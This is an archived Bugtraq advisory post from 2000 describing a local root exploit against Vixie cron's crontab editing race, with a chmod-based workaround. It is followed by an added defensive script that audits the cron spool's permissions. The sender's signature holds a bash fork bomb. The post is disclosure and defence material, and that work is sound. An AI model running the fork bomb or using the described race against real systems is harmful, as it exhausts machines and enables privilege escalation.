[17678] in bugtraq


vixie cron...

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Fri Nov 17 01:25:41 2000

Message-Id:  <Pine.LNX.4.21.0011170517470.13016-200000@nimue.tpi.pl>
Date:         Fri, 17 Nov 2000 05:41:32 +0100
Reply-To: Michal Zalewski <lcamtuf@TPI.PL>
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM



Attached shell-script exploits fopen() + preserved umask vulnerability in
Paul Vixie's cron code. It will work on systems where /var/spool/cron is
user-readable (e.g. 0755) - AFAIR Debian does so. RedHat (at least 6.1 and
previous) has mode 0700 on /var/spool/cron, and thus it isn't exploitable
in its default configuration... (ahmm, but this does NOT mean it is a
problem of o+rx bits, but of insecure umask() and fopen() calls).

I have no information about other distributions or systems - this exploit
should automagically detect if you are vulnerable or not (checking
/var/spool/cron, looking for Paul Vixie's crontab, etc.). Please report
your findings to me and/or to BUGTRAQ.

If any of your users launched this exploit on screen, and then any other
user (including superuser) invoked "crontab -e" to change his/her crontab
entries, privilege elevation will occur. The main attack is performed
while root (or any other user, but this particular exploit is configured
against root - feel free to change it) is editing his crontab entry. After
any modification, when crontabs are updated, this exploit will try to
insert evil code over the original contents of the crontab file
(probability of successful exploitation is near 100%). This, after
approximately one minute, leads to account compromise.

At the beginning, this exploit tries to abuse the crontab utility in order
to create a somewhat enormous number of world-writable temporary files
(these files are opened with fopen(), and then rename()d to the destination
name - ugh!). It might take some time and cause more or less heavy load on
ancient boxes. After finishing, the exploit waits, consuming little or
no system resources, until a "crontab -e" session appears. For more
details, see exploit code.

Vendors were not notified because I have no idea which systems and distros
are shipping vulnerable configuration, and because a pretty good workaround
is simple: chmod 700 /var/spool/cron.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

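An audit script for the workaround the post recommends, added here as an example and not part of the original post or its attachment. It checks whether a cron spool directory is closed to group and others (mode 700 or stricter) and counts world-writable files left inside it; the default path /var/spool/cron and the use of plain ls/find/cut are assumptions.

```shell
#!/bin/sh
# Added example, not the original post's code. Audits a cron spool directory
# against the "chmod 700 /var/spool/cron" workaround described in the post.
# Assumes a POSIX shell with ls, cut, find and wc available.

# Return 0 when the directory grants no group/other permissions (700 or
# stricter), 1 when it is more open, 2 when it does not exist.
spool_locked_down() {
    dir="${1:-/var/spool/cron}"
    [ -d "$dir" ] || return 2
    # ls -ld prints e.g. "drwx------ ..."; columns 5-10 are the group and
    # other permission bits, which must all be '-'.
    bits=$(ls -ld "$dir" | cut -c5-10)
    case "$bits" in
        ------) return 0 ;;
        *)      return 1 ;;
    esac
}

# Print the number of world-writable regular files under the spool; the
# fopen()/rename() race in the post leaves exactly such files behind.
world_writable_count() {
    dir="${1:-/var/spool/cron}"
    [ -d "$dir" ] || { echo 0; return 0; }
    find "$dir" -type f -perm -002 2>/dev/null | wc -l | tr -d ' '
}

# Human-readable summary; always returns 0 so it is safe under "set -e".
report() {
    dir="${1:-/var/spool/cron}"
    if spool_locked_down "$dir"; then
        echo "$dir: group/other access denied (workaround in place)"
    else
        echo "$dir: group/other access allowed - consider: chmod 700 $dir"
    fi
    echo "$dir: world-writable files: $(world_writable_count "$dir")"
    return 0
}

# Usage: sh audit-cron-spool.sh [/path/to/spool]
if [ $# -gt 0 ]; then
    report "$1"
fi
```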
